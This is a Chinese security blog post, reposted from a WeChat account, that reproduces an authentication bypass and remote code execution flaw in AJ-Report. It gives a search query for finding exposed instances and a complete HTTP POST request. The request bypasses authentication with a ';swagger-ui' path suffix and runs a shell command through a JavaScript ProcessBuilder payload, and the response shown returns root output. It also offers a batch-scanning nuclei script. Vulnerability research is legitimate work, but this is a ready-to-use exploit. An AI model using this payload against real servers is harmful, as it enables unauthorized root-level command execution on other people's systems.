【漏洞复现】AJ-Report 认证绕过与远程代码执行漏洞

admin 2024年5月24日12:48:35评论22 views字数 1406阅读4分41秒阅读模式

声明

该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

公众号现在只对常读和星标的公众号才展示大图推送,建议把公众号设为星标,否则可能就看不到啦!感谢各位师傅。

资产收集

title="AJ-Report"

【漏洞复现】AJ-Report 认证绕过与远程代码执行漏洞

漏洞复现

【漏洞复现】AJ-Report 认证绕过与远程代码执行漏洞

发送请求

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Content-Type: application/json;charset=UTF-8Connection: closeContent-Length: 339{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder("id").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

返回包

HTTP/1.1 200Access-Control-Allow-Credentials: trueAccess-Control-Allow-Methods: *Access-Control-Allow-Headers: *Access-Control-Expose-Headers: *Content-Type: application/json;charset=UTF-8Date: Thu, 23 May 2024 02:01:33 GMTConnection: closeContent-Length: 114{"code":"200","message":"操作成功","args":null,"ext":null,"data":"用户id=0(root) 组id=0(root) 组=0(root)"}

批量验证脚本

关注公众号并回复 “ZH-2024-05-24-001 即可获得该漏洞nuclei脚本

【漏洞复现】AJ-Report 认证绕过与远程代码执行漏洞

原文始发于微信公众号(Devil安全):【漏洞复现】AJ-Report 认证绕过与远程代码执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月24日12:48:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】AJ-Report 认证绕过与远程代码执行漏洞https://cn-sec.com/archives/2773446.html

发表评论

匿名网友 填写信息